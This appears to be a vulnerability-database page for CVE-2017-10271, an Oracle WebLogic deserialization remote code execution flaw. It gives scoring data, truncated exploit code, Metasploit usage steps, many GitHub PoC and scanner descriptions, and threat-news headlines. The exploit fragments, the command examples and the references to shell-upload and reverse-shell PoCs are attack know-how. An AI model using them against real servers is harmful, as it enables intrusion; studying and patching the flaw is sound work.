CVE-2017-10271

Published: 19/10/2017 Updated: 03/10/2019
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 526
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Vulnerable Products

oracle weblogic server 10.3.6.0.0

oracle weblogic server 12.2.1.1.0

oracle weblogic server 12.1.3.0.0

oracle weblogic server 12.2.1.2.0

Exploits

##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  # include Msf::Exploit::Remote::HttpServer
  def initialize(info = {})
    super( u ...

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Weblogic wls-wsat Component Deserialization RCE
# Date Authored: Jan 3, 2018
# Date Announced: 10/19/2017
# Exploit Author: Kevin Kirsche (d3c3pt10n)
# Exploit Github: github.com/kkirsche/CVE-2017-10271
# Exploit is based off of POC by Luffin from Github
# github ...

import requests
import sys

url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}

def payload_command (command_in):
    # XML entity escaping for the characters that would break the SOAP body
    html_escape_table = {
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
        ">": "&gt;",
        "<": "&lt;",
    }
    command_f ...

Mailing Lists

The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 ...

Metasploit Modules

Oracle WebLogic wls-wsat Component Deserialization RCE

The Oracle WebLogic WLS WSAT Component is vulnerable to an XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.

msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
msf exploit(oracle_weblogic_wsat_deserialization_rce) > show targets
    ...targets...
msf exploit(oracle_weblogic_wsat_deserialization_rce) > set TARGET <target-id>
msf exploit(oracle_weblogic_wsat_deserialization_rce) > show options
    ...show and set options...
msf exploit(oracle_weblogic_wsat_deserialization_rce) > exploit

Oracle Weblogic Server Deserialization RCE - AsyncResponseService

An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.

msf > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
msf exploit(weblogic_deserialize_asyncresponseservice) > show targets
    ...targets...
msf exploit(weblogic_deserialize_asyncresponseservice) > set TARGET <target-id>
msf exploit(weblogic_deserialize_asyncresponseservice) > show options
    ...show and set options...
msf exploit(weblogic_deserialize_asyncresponseservice) > exploit

Github Repositories

cve-2017-10271 POC

CVE-2017-10271 POC. Introduction: This is an autotest PoC for CVE-2017-10271, tested on CentOS 7 and Windows 7/10. Building: This project is written in Rust. You need to install the Rust environment from www.rust-lang.org/ first and then build the project with the following command: $ cargo build --release. Then you can get the binary at target/release/cve-2017-10

CNVD-C-2019-48814 PoC, works on Linux and Windows

CNVD-C-2019-48814, works on Linux and Windows (CVE-2019-2725). WebLogic wls9-async deserialization remote command execution vulnerability. Notes: It does not work when WebLogic has been patched for CVE-2017-10271 (10.3.6.0, 12.1.3.0). Modified from jas502n's script. Usage: python async_command_favicon_all.py 127.0.0.1:7001. Reproduction: 1. Windows Server 2012 servers/AdminServer/tmp/_

cve-2017-10271

CVE-2017-10271: This is part of Cved, a tool to manage vulnerable docker containers. Cved: gitlab.com/git-rep/cved. Image source: github.com/cved-sources/cve-2017-10271. Image author: github.com/henryzzq/ubuntu_weblogic1036_domain/tree/master/ubuntu/weblogic1036_domain

javalearn: Java deserialization study. CVE-2017-10271 EXPLOIT TOOL, tested on WebLogic 10.3.6. For learning and exchange only; do not use for illegal purposes. SHA-1: 34193b9c8e49d16e335c691b00fc3b319c99c2d2 MD5: 88022abf8f18536bf9e62cdcb8b5163a

Introduction: Oracle WebLogic CVE-2017-10271 batch vulnerability detection tool (multi-threaded). Installation: git clone github.com/sch01ar/CVE-2017-10271.git; cd CVE-2017-10271; pip3 install -r requirements.txt. Usage: python3 CVE-2017-10271.py -i [url_file] -o [result_file] -t [threads]. Warning: do not use for illegal purposes!!!

A collection of rather interesting exploits

Exp_Collection: Weblogic CVE-2017-10271 (with command echo)

CVE-2017-10271 Weblogic vulnerability verification PoC and patch

CVE-2017-10271: Weblogic vulnerability verification PoC. Usage: python weblogic.py -u '****:7001/wls-wsat/CoordinatorPortType' -c 'touch /tmp/test'. Click here to download the patch.

Look for WebLogic WSAT RCE from a list

weblogic-wsat-scan: look for WebLogic WSAT RCE from a list, based on github.com/c0mmand3rOpSec/CVE-2017-10271/blob/master/scanner.sh. Ref: github.com/c0mmand3rOpSec/CVE-2017-10271

WebLogic CNVD-C-2019_48814 CVE-2017-10271

WebLogic_CNVD_C_2019_48814 WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm

Weblogic_Wsat_RCE

POC for CVE-2017-10271. Since java.lang.ProcessBuilder was the original vector for RCE, there are multiple signature based rules that block this particular payload. Added java.lang.Runtime and will add others in the future. This is for educational purposes only: I take no responsibility for how you use this code.

CVE-2019-2725 PoC summary; updated PoC that bypasses the CVE-2017-10271 patch

CNVD-C-2019-48814 and CNNVD-201904-961. Thanks to t00ls-ximcx0101 for providing the script. CNVD-C-2019-48814 POC Summary. Related links: 清水川崎's Jianshu post: www.jianshu.com/p/c4982a845f55; repost by 安全祖师爷: dwz.cn/2GQvbUae. Because of environmental factors the path may vary; the default upload path is: servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war

WebLogic Exploit

CVE-2017-10271 identification and exploitation. Unauthenticated Weblogic RCE. nvd.nist.gov/vuln/detail/CVE-2017-10271; www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: SOMEHOSTHERE
Content-Length: 1226
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
User-Agent: python-

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful …

CVE-2017-10271 Usage: python CVE-2017-10271.py url

forked from https://github.com/s3xy/CVE-2017-10271. Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HT…

weblogic_wls_wsat_rce: exploitation script for the Weblogic wls-wsat component deserialization vulnerability (CVE-2017-10271), modified with reference to github.com/s3xy/CVE-2017-10271. Command execution with echoed output; direct shell upload. Tested OK on WebLogic 10.3.6.0 under Linux. Usage and parameters: python weblogic_wls_wsat_exp.py -t 1721680131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHE

cve-2017-10271

weblogic_wls-wsat_component_deserialisation_rce_cve-2017-10271 poc&exp. The exp only works while the path exists; works for single or multiple targets. ==just for learn==

CVE-2017-10271

CVE-2017-10271: command execution with echoed output; direct shell upload. Tested OK on WebLogic 10.3.6.0 under Linux. Usage and parameters: python weblogic_wls_wsat_exp.py -t IP:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET

(CVE-2017-10271) Java deserialization vulnerability

-CVE-2017-10271- (CVE-2017-10271) Java deserialization vulnerability. Java deserialization vulnerability exploitation tool V1.0: a checking tool for Java deserialization-related vulnerabilities, developed with JDK 1.8; running the software requires JDK 1.8 or above.

CVE-2017-10271 POC

CVE-2017-10271: detection script for the Weblogic wls-wsat component deserialization vulnerability (CVE-2017-10271). Usage: $ python CVE-2017-10271 url. You also need to register a ceye.io account and fill the Identifier and API Token it provides into the following part of the code: Features: detects whether Weblogic in Windows and Linux environments has the CVE-2017-10271 remote command execution vulnerability. Currently only tested in a Linux environment; Windows and L

WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware. This is a Remote Code Execution vulnerability.

WebLogic honeypot. Cymmetria Research, 2018, www.cymmetria.com/. Written by: Omer Cohen (@omercnet). Special thanks: Imri Goldberg (@lorgandon), Itamar Sher, Nadav Lev. Contact: research@cymmetria.com. WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware. This is a Remote Code Execution v

Simplified PoC for Weblogic-CVE-2017-10271

PoCs-Weblogic_2017_10271 Simplified PoC for Weblogic-CVE-2017-10271

AD 2021: a record of my 2021 (inspired by yihong). Bookmarked blogs (No. / Blog / Notes): 1. jimmysong.io, cloud-native technology learning; 2. github.com/Maskhe/javasec, Java security learning. Bookmarked articles (No. / Title / Tags / Notes): 1. "Four levels of WAF attack and defense research: Bypass WAF", Web Security, WAF, in-depth summary!; 2. "Get all IPs of a given country", Tool, -; 3. BlackHat USA

weblogic-CVE-2019-2729-POC python3 POC for CVE-2019-2729 WebLogic Deserialization Vulnerability and CVE-2017-10271 amongst others

Oracle-WebLogic-CVE-2017-10271

WebLogic Wls-wsat XMLDecoder. Vulnerability description: mitre: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3506. Early on, attackers used the WebLogic WLS component vulnerability to launch wide-ranging remote attacks on enterprise servers; a large number of enterprise servers were compromised, and the number of attacked enterprises showed a clear upward trend, which deserves serious attention. Among them, CVE-2017-3506 is one that exploits the WLS in Oracle WebLogic

CVE-2017-10271. Usage: CVE-2017-12149.py targetip:port/. WEBLOGIC RCE. Works with Windows only; you could edit the code a bit for Linux.

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-10271: Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script. Usage: $ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r willbepwned.com:7001/ Features: Standalone Python script; check functionality to see if any host is vulnerable; exploit functionality for Linux targets; Metasploit module; check functionali

WebLogic vulnerability scanning tool

weblogic-scan: WebLogic vulnerability scanning tool, a wild attempt at one-shot WebLogic scanning. Currently detected: console page detection & weak password scanning; SSRF on the uuid page; CVE-2017-10271 deserialization on the wls-wsat page; CVE-2018-2628 deserialization; CNVD-C-2019-48814. More features will be added later if possible; the main problem is that some deserialization PoCs are really hard to write, and I'm not great at it. USE: usage

WebLogic wls9-async deserialization remote command execution vulnerability

CNVD-C-2019-48814: WebLogic wls9-async deserialization remote command execution vulnerability, echo PoC for WebLogic. Patch update: www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html. Reproduction: 101020166:7001/_async/AsyncResponseService; curl -i 101020166:7001/_async/favicon.ico. CNVD-C-2019-48814 Video: python CNVD-C-2019-48814.py -u

CVE-2017-10352 CVE-2017-10271 weblogic-XMLDecoder

This software is for learning and exchange only; use for any illegal activity is prohibited. #Weblogic-XMLDecoder-GUI CVE-2017-10352: a Python GUI experimental project. Its main function targets exploitation of the deserialization vulnerability caused by the WebLogic XMLDecoder; the development goal was to become familiar with the Python tkinter library and the ttk extension. It will later be packaged as a Windows executable. The vulnerabilities mainly targeted are CVE-2017-10271 and CVE-2017-10352,

Awesome Honeypots: A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects. There is no pre-established order of items in each category; the order is for contribution. If you want to contribute, please read the guide. Discover more awesome lists at sindre

Weblogic Upload Vuln (needs username and password) - CVE-2019-2618

cve-2019-2618: Weblogic Upload Vuln (needs username and password) - CVE-2019-2618. Python usage: python CVE-2019-2618.py url username password. Decrypting the WebLogic password: root@f0cb7e674d7e:~/Oracle# cat /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/security/boot.properties |grep pass password={AES}dv/eNBsyg5GcDUbAKaQRheDZhzVk9yiTYVpXlGt9wEU= root@f0cb7e674d7

CustomSignatures: custom signatures I created or modified for McAfee NSP for myself. Please use them at your own risk. My threat repo is below: otx.alienvault.com/user/papa_anniekey/pulses. UDS-HTTPJavaScript obfuscated with jjencode detected.zip: github.com/papa-anniekey/CustomSignatures/raw/master/UDS-HTTPJavaScript%20obfuscated%20with%20jjencode%20detected.zip Ori

Weblogic-XMLDecoder-POC: PoCs for the WebLogic XMLDecoder series of vulnerabilities. Vulnerability versions: CVE-2017-3506, CVE-2017-10271, CVE-2019-2725. CVE-2017-3506: the project's poc/2017-3506 directory holds two PoCs: poc1.xml executes a command that creates a diggid file under /tmp, which has to be verified inside the Docker container; poc2.xml: reverse shell, requires an outbound connection. CVE-2017-10271: same as 3506. CVE-2019-2725: the project's poc/2019-2725 directory

CyberSEC & anti-SPY. Everything about security issues :: Windows 10 Hardening Script :: This is based mostly on my own personal research and testing. My objecti

WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit

CVE-2019-2725 WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder & exploit. Info / Help: $ python3 weblogic_exploit.py -h ======================================================================== | WebLogic Universal Exploit | | CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2

Source code of open-source security products

Project introduction: collects a large number of open-source projects from the cybersecurity industry, each of which is dedicated to solving some security problem. Collection approach: one is to follow the security open-source projects of Internet companies/teams, which have been practiced internally and whose best practices are worth learning from; the other comes from the needs of enterprise security capability building, classified by need, such as WAF, HIDS, Git monitoring, etc.

Awesome Honeypot Resource Collection. Including 250+ Honeypot tools, and 350+ posts about Honeypot.

All collection projects: All collected open-source tools: sec-tool-list: over 18K entries, in both Markdown and JSON formats. Cross-platform reverse engineering resources: awesome-reverse-engineering: Windows platform security: PE/DLL/DLL-Injection/Dll-Hijack/Dll-Load/UAC-Bypass/Sysmon/AppLocker/ETW/WSL/NET/Process-Injection/Code-Injection/DEP/Kernel/; Linux security: ELF/; macOS/iXxx security: Mach-O/jailbreak/LLDB/XCode

Produced by 雷石安全实验室. V2.0: added batch vulnerability detection; removed the login password box. V1.0: WebLogic administrator console path leak vulnerability; weak passwords: WebLogic, weblogic, Oracle@123, password, system, Administrator, admin; CVE-2014-4210 WebLogic SSRF vulnerability: affected versions: 10.0.2, 10.3.6; 127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp; CVE-2017-3506 & CVE-201

CMS-Hunter. Introduction: Content Management System Vulnerability Hunter. Note: as it stands, this project will be maintained long-term; suggestions or ideas for changes are welcome, please contact the author. CMS vulnerability list: Discuz: Discuz_<3.4_birthprovince_front-end arbitrary file deletion; DedeCMS: DedeCMS_v5.7_shops_delivery_stored XSS; DedeCMS_v5.7_carbuyaction_stored XSS; DedeCMS_v5.7_friend-links CSRF_GetSh

A record of POC/EXP written during vulnerability research

vuln_Exploit: a record of POC/EXP written during vulnerability research (some POC/EXP cannot be made public for work reasons). Shiro: rememberMe generation, Shiro 550. Weblogic: WebLogic < 10.3.6 deserialization vulnerability (CVE-2017-10271); WebLogic admin console unauthorized access (CVE-2020-14882); WebLogic admin console command execution (CVE-2020-14883). phpMyAdmin: phpMyAdmin Remote Code Exec

N-MiddlewareScan: a heavily modified, self-written middleware vulnerability scanning script

N-MiddlewareScan: a heavily modified, self-written middleware vulnerability scanning script. I have recently been looking at web middleware vulnerabilities and saw a three-year-old script: github.com/ywolf/F-MiddlewareScan. I thought about writing a middleware-related one myself; the script itself is easy to write, but the PoCs and exploits are hard. GitHub link: github.com/nihaohello/N-MiddlewareScan. #plugins vuln poc exp. Mainly the following modules: 1. axis xss

WeblogicScanLot series, Weblogic batch vulnerability detection tool, V2.2

The project is no longer maintained; the batch scanning feature has been merged into github.com/rabbitmask/WeblogicScan. Software author: Tide_RabbitMask. Disclaimer: Pia!(o ‵-′)ノ”(ノ﹏<。) This tool is for security testing only; do not use it for illegal purposes, be good~ V2.2 introduction: provides Weblogic batch detection and covers almost all historical Weblogic vulnerabilities. [Never encountered weblogi

Automated Tools Pentest

ABOUT: Kn0ck is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. KN0CK COMMUNITY FEATURES: Automatically collects basic recon; automatically launches Google hacking queries against a target domain; automatically enumerates open ports via Nmap port scanning; automatically brute forces sub-domains, gathers DNS info an

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding

poc-exp: a record of POC/EXP written during vulnerability research (some cannot be made public for work reasons). Shiro: Shiro550 rememberMe deserialization vulnerability (CVE-2016-4437). fastjson: fastjson 1.2.22-1.2.24 TemplatesImpl exploit chain; fastjson <= 124 JdbcRowSetImpl exploit chain; fastjson 1.2.24-1.2.68 gadgets. Weblogic: WebLogic < 10.3.6 deserialization vulnerability (CVE-2017-10271). WebLo

Payloads_All_The_Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques! I <3 pull requests :) You can also contribute with a beer IRL or with buymeacoffee.com. Every section contains the following files; you can use the _template_vuln folder to create a new chapter: README.md - vulnerability d

vuln_Exploit: a record of POC/EXP written during vulnerability research (some POC/EXP cannot be made public for work reasons). Shiro: Shiro550 rememberMe deserialization vulnerability (CVE-2016-4437). fastjson: fastjson 122-124 TemplatesImpl exploit chain; fastjson <= 124 JdbcRowSetImpl exploit chain; to do: plan to write a fastjson exploitation tool in Java. Weblogic: WebLogic < 10.3.6

Code + documentation for the public GreyNoise API

GreyNoise Intelligence Alpha API. Summary: GreyNoise is a system that collects and analyzes data on Internet-wide scanners. GreyNoise collects data on benign scanners such as Shodan.io, as well as malicious actors like SSH and telnet worms. The data is collected by a network of sensors deployed around the Internet in various datacenters, cloud providers, and regions. URL: https:

WebLogic vulnerability test scripts

weblogic_http.py -- CVE-2014-4210, CVE-2017-3506, CVE-2017-10271, CVE-2019-2725; weblogic_t3.py -- CVE-2016-0638, CVE-2016-3510, CVE-2017-3248, CVE-2018-2628, CVE-2018-2893

AD-Pentesting-Tools Pentest-Tools General useful Powershell Scripts AMSI Bypass restriction Bypass Payload Hosting Network Share Scanner Lateral Movement Reverse Shellz POST Exploitation Pivot Backdoor finder Persistence on windows Web Application Pentest Framework Discovery Framework Scanner / Exploitation Web Vulnerability Scanner / Burp Plugins Network- / Service-level Vul

Enhanced WeblogicScan: more accurate detection results, plugin-based, adds CVE-2019-2618 and CVE-2019-2729 detection, Python3 support

WeblogicScan: enhanced WeblogicScan, modified from rabbitmask's WeblogicScan V1.2. Original project address before modification: github.com/rabbitmask/WeblogicScan. DEFF: Python3 support; fixed false positives in vulnerability detection, so detection results are more accurate; added CVE-2019-2729 and CVE-2019-2618 vulnerability detection; plugin-based vulnerability scanning components; added colored output. INSTALL: pip3 install -r requirements.txt

Weblogic one-click vulnerability detection tool, V1.5, updated: 20200730

WeblogicScan: Weblogic one-click vulnerability detection tool, V1.5. Software author: Tide_RabbitMask. Disclaimer: Pia!(o ‵-′)ノ”(ノ﹏<。) This tool is for security testing only; do not use it for illegal purposes, be good~ V1.5 feature introduction: provides one-click PoC detection and covers almost all historical Weblogic vulnerabilities. Details: #Console path leak Console #SSR

Weblogic batch vulnerability detection tool | modified from the original according to my own needs

WeblogicScan: Weblogic one-click batch vulnerability detection tool, V1.0. Software author: Bywalks. Disclaimer: Pia!(o ‵-′)ノ”(ノ﹏<。) This tool is for security testing only; do not use it for illegal purposes, or bear all consequences yourself~ This version is modified from rabbitmask's WeblogicScan tool, with some optimizations based on my needs. V1.0 usage: 需检

Exploit Development Table of Contents General Stuff/Techniques Acquiring Old/Vulnerable Software Practice Exploit Dev/Structured Learning Exploit Dev Papers bof ROP BlindROP SignalROP JumpROP Heap Format String Integer Overflows Null Ptr Dereference JIT-Spray ASLR Kernel Exploitation Use After Free Other writing shellcode Windows Specific Linux specific Tutorials AV B

Source tool link: github.com/rabbitmask/WeblogicScan. Weblogic_Vuln_Scan. Simplified Chinese | English. As of March 29, 2021, a WebLogic vulnerability scanning tool. If there is an unrecorded vulnerability with a public PoC, feel free to submit an issue. The original author's collection is already fairly complete; here some bug fixes were made for issues such as script PoCs not taking effect and configuration errors. Previously I looked up

Pentest-Tools. General useful Powershell Scripts, AMSI Bypass, restriction Bypass, Payload Hosting, Network Share Scanner, Lateral Movement, Reverse Shellz, POST Exploitation, Pivot, Backdoor finder, Persistence on windows, Web Application Pentest, Framework Discovery, Framework Scanner / Exploitation, Web Vulnerability Scanner / Burp Plugins, Network- / Service-level Vulnerability Scanner, C

WebLogic vulnerability scanning tool. Currently covers CVE-2014-4210, CVE-2016-0638, CVE-2016-3510, CVE-2017-3248, CVE-2017-3506, CVE-2017-10271, CVE-2018-2628, CVE-2018-2893, CVE-2018-2894, CVE-2018-3191, CVE-2018-3245, CVE-2018-3252, CVE-2019-2618, CVE-2019-2725, CVE-2019-2729, CVE-2019-2890, CVE-2020-2551

Source tool link: github.com/rabbitmask/WeblogicScan. weblogicScaner (Simplified Chinese | English). As of 7 March 2020, a WebLogic vulnerability scanning tool. If there is a vulnerability that is not yet recorded and has a public POC, feel free to open an issue. The original author had already collected these fairly completely; this fork adds some bug fixes for problems such as POC scripts that did not work and configuration errors. Previously I had a look

jok3r

Jok3r is a Python3 CLI application which is aimed at helping penetration testers for network infrastructure and web black-box security tests.

5号黯区 Penetration Manual. Various websites: github.com/fuzzdb-project/fuzzdb; github.com/danielmiessler/SecLists (wordlists); github.com/tennc/webshell (the most complete collection of webshell scripts); github.com/Ridter/Pentest (assorted scripts from a top practitioner); filemaytercn/ (mayter's sharing site); www.somd5.com/download/dict/ (wordlists); securityxploded.com/download.php

A list of useful payloads and bypasses for web application security and pentest / CTF

Useful Pentest tool links

Pentest-Tools Red-Team-Essentialss. General useful Powershell Scripts, AMSI Bypass, restriction Bypass, Payload Hosting, Network Share Scanner, Lateral Movement, Reverse Shellz, POST Exploitation, Pivot, Backdoor finder, Persistence on windows, Web Application Pentest, Framework Discovery, Framework Scanner / Exploitation, Web Vulnerability Scanner / Burp Plugins, Network- / Service-level Vu

Jok3r - Network and Web Pentest Framework

Jok3r is a Python3 CLI application aimed at helping penetration testers with network infrastructure and black-box web security tests. Its main goal is to save time on everything that can be automated in the network/web under audit, so that more time can be spent on things that are more

Windows Exploit Development Tutorial Series

Exploit Development. Table of Contents: General; Acquiring Old/Vulnerable Software; Practice Exploit Development/Structured Learning; Exploitation Papers; BOF; ROP; BlindROP; SignalROP; JumpROP; Heap; Format String; Integer Overflows; Null Pointer Dereference; JIT-Spray; ASLR; Kernel Exploitation; Use-After-Free; Other Tutorials; Assembly; Writing Shellcode; Windows Specific; Linux Specific

pocsuite3 verification POC code for vulnerability checks

some_pocsuite. pocsuite3 verification POC code used for internal enterprise vulnerability checks and verification (pocsuite3 is the open-source vulnerability testing framework of the Knownsec security team). Because the original Pocsuite is no longer updated, all of the original POC code has been rewritten and migrated to pocsuite3; the original POCs are backed up in PocsuiteV2. Writing plugin code: uses the pocsuite3 vulnerability testing framework; for plugin writing, please refer to pocs

Recent Articles

Beapy: Cryptojacking Worm Hits Enterprises in China
Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2021

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Posted: 24 Apr, 2019. 6 Min Read.
Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign
Threatpost • Lindsey O'Donnell • 17 Feb 2021

Cryptocurrency-mining malware, called WatchDog, has been running under the radar for more than two years – in what researchers call one of the largest and longest-lasting Monero cryptojacking attacks to date.
The attack is still in operation as of this writing – and due to the size and scope of the infrastructure, it will be difficult to fully contain, researchers told Threatpost. Thus far, attackers have hijacked at least 476 Windows and Linux devices, in order to abuse their system ...

Rocke Group’s Malware Now Has Worm Capabilities
Threatpost • Lindsey O'Donnell • 28 Jan 2021

Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.
The malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with “worm” capabilities and rootkit detection-evasion features.
“This malware is an example that demonstrates that cloud providers’ agent-based security solutions may not be enough to prevent evasive malware targeted at publ...

Chinese-linked Muhstik botnet targets Oracle WebLogic, Drupal
BleepingComputer • Ax Sharma • 11 Nov 2020

Muhstik botnet, also known as Mushtik, has been targeting cloud infrastructure and IoTs for years.
The botnet mainly funds itself by mining cryptocurrency using open source tools like XMRig and cgminer.
New details have emerged related to this malware that shed light on its nefarious activities and origins.
Muhstik is a botnet that leverages known web application exploits to compromise IoT devices, such as routers, to mine cryptocurrency.
It leverages IRC servers ...

Golang Worm Widens Scope to Windows, Adds Payload Capacity
Threatpost • Tara Seals • 25 Jun 2020

A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.
The malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetc...

Self-Propagating Lucifer Malware Targets Windows Systems
Threatpost • Lindsey O'Donnell • 24 Jun 2020

Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.
The never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an “exhaustive” list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes....

APT review: what the world’s threat actors got up to in 2019
Securelist • David Emm • 04 Dec 2019

What were the most interesting developments in terms of APT activity during the year and what can we learn from them?
This is not an easy question to answer, because researchers have only partial visibility and it's impossible to fully understand the motivation for some attacks or the developments behind them. However, let's try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.
Target...

APT trends report Q3 2019
Securelist • GReAT • 16 Oct 2019

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.
This is our latest installment, f...

Panda Threat Group Mines for Monero With Updated Payload, Targets
Threatpost • Lindsey O'Donnell • 17 Sep 2019

The Panda threat group, best known for launching the widespread and successful 2018 “MassMiner” cryptomining malware campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.
While considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services...

Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig
Threatpost • Tara Seals • 06 May 2019

Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there’s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks – especially since the bug is “trivial” to exploit.
Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle r...

Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw
Threatpost • Lindsey O'Donnell • 01 May 2019

UPDATE
A variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.
The newfound samples of Muhstik are targeting the recently-patched CVE-2019-2725 in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.
“From the timeline, we can see that the developer of Muhs...

Rocke's Cryptominers Kills Competition, Uninstall Cloud Security Products
BleepingComputer • Ionut Ilascu • 17 Jan 2019

Analysis of new malware samples used by the Rocke group for cryptojacking reveals code that uninstalls from Linux servers multiple cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud.
Rocke's goal is to compromise Linux machines and use them to mine for Monero cryptocurrency. They exploit several vulnerabilities in Apache Struts 2, Oracle WebLogic and Adobe ColdFusion.
Analyzing the new malware strains used by Rocke, researchers from Palo Alto Network'...

Click It Up: Targeting Local Government Payment Portals
Fireeye Threat Research • by Nick Richard, DJ Palombo, Tyler Dean, Alexander Holcomb, Charles Carmakal • 19 Sep 2018

